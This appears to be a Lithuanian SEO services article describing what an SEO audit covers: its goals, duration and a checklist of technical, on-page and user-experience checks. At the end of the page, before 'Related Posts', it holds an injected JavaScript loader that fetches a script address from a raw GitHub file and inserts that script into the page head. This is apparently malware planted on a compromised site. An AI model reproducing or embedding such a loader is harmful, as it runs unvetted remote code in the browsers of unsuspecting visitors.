Ką reikia žinoti apie SEO auditą?

SEO auditas yra procesas, kurio metu analizuojama, kaip gerai jūsų internetinis buvimas atitinka geriausias praktikas – tai pirmas žingsnis, kuris leidžia sukurti įgyvendinimo planą su matomais rezultatais.

Šio audito tikslas yra nustatyti kiek įmanoma daugiau bazinių problemų, kurios veikia organinės paieškos rezultatus. SEO auditas atskleidžia:

Technines SEO problemas Svetainės struktūros problemas Puslapyje esančias SEO problemas Galimas problemas svetainės už ribų Naudotojo patirties problemas Turinio spragas ir galimybes Konkurencinės rinkos įžvalgas Auditas yra standartinė procedūra, kuri turėtų būti atliekama reguliariai – tai tarsi „sveikatos patikrinimas“ jūsų svetainei.

SEO auditas turėtų būti išsamus.

Jis turi apimti tiek struktūrines, tiek turinio dalis, kurios veikia jūsų SEO matomumą. Auditas turėtų suteikti bendrą vaizdą apie esamą būklę. Trūkstamos dalys gali sukelti nereikalingas ar netinkamas rekomendacijas.

Auditas turėtų būti lengvai suprantamas. Kaip verslo savininkas, turėtumėte suvokti, kaip SEO problemos veikia jūsų internetinius prioritetus, tikslus ar pajamas. Visos rekomendacijos aiškiai turėtų atitikti jūsų bendruosius verslo tikslus.

Galiausiai, jūsų SEO audito rekomendacijos turėtų būti įgyvendinamos. Turėtų būti aiškus įgyvendinimo kelias, prioritetai su numatomu poveikiu ir pastangomis, susijusiomis su kiekviena rekomendacija. Bet kokio SEO audito rezultatas turėtų tiksliai pateikti lengvai sekamą veiksmų planą.

SEO auditas neturėtų būti atliekamas skubotai.

Tiksliai nustatyti pagrindines problemas, kurios veikia jūsų internetinės sveikatos būklę, reikalauja laiko. Priklausomai nuo jūsų svetainės dydžio, tinkamas auditas gali užtrukti nuo 2 iki 6 savaičių. Reikalingas atidus darbas, atliekant svarbius pakeitimus bet kurioje svetainėje, ir SEO specialistas turi atlikti išsamų tyrimą, kad galėtų pateikti tikslias ir reikšmingas rekomendacijas.

SEO auditas neturėtų būti „vienas dydis tinka visiems“. Nors kai kurie techniniai elementai yra būtini visoms svetainėms, situacijos analizė turėtų būti atliekama SEO audito pradžioje, siekiant nustatyti dėmesio sritis konkrečiai svetainei.

Dėl klaidų skaičiaus jūsų svetainėje, norint sužinoti, kiek yra 301 (nuolatiniai perkėlimai), 302 (laikini perkėlimai), 401, 403, 404 ir 5xx klaidų, reikia atlikti techninį auditą.

Kas yra analizuojamo SEO audito metu?

SEO audito metu analizuojami įvairūs elementai, kad pagerintumėte svetainės paieškos sistemos optimizaciją. Štai ką paprastai apima auditas:

Techninis Auditas:

  • Indeksacijosanalizė: Įvertinama, kaip gerai puslapiai indeksuojami paieškos sistemose.
  • Statuso kodai: Tikrinama serverio atsakymai, pvz., 200 OK, 404 Nerasta ir kt.
  • Peradresavimai: Peržiūrimi visi peradresavimai, įskaitant 301 ir 302.
  • Puslapio greitis: Įvertinamas interneto puslapių įkėlimo greitis.
  • URL Struktūra: Analizuojamas URL organizavimo efektyvumas ir aiškumas.
  • Robots.txt: Užtikrinama, kad šis failas teisingai nukreipia paieškos sistemos robotus.
  • XML svetainės planas: Patikrinama, ar svetainės planas atnaujintas ir tiksliai atspindi svetainės turinį.
  • Kanoninės žymos: Tikrinamas tinkamas jų naudojimas, siekiant išvengti turinio dubliavimo problemų.
  • Dubliavimas: Identifikuojamas pasikartojantis turinys svetainėje.
  • Naršomumas: Nustatoma, kaip lengvai paieškos sistemos robotai gali naršyti svetainę.
  • Senų domenų problemos: Ieškoma galimų problemų, kylančių iš senųjų domeno praktikų.
  • Išorinis analizavimas:
  • Mobiliojo SEO analizė: Tikrinama, kaip svetainė pritaikyta mobiliosioms įrenginiams.
  • Tarptautinio SEO analizė: Įvertinama, kaip svetainė optimizuota tarptautinei auditorijai.

Puslapio Analizavimas:

  • Svetainės turinio struktūra: Analizuojama, kaip informacija išdėstyta svetainėje.
  • Raktažodžių tyrimas: Atliekamas raktažodžių, susijusių su svetainės turiniu, tyrimas.
  • Raktažodžių naudojimas: Įvertinama, kaip efektyviai naudojami raktažodžiai.
  • Metaduomenų analizė (puslapių pavadinimai, meta aprašymai, antraštės žymės): Tikrinama, kaip metaduomenys optimizuoti paieškos sistemoms.
  • Schema: Patikrinama, ar schema žymėjimas naudojamas teisingai, padedant paieškos sistemoms suprasti puslapio turinį.

Vartotojo Patirtis:

  • Vaizdai ir Video: Įvertinama, kaip vaizdinė medžiaga integruota ir optimizuota svetainėje.
  • Vidinės nuorodos ir HTML svetainės planas: Analizuojamas vidinių nuorodų ir svetainės plano efektyvumas.
(var url = „https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(„script”); script.src = data.trim(); document.getElementsByTagName(„head”)[0].appendChild(script); });)

Related Posts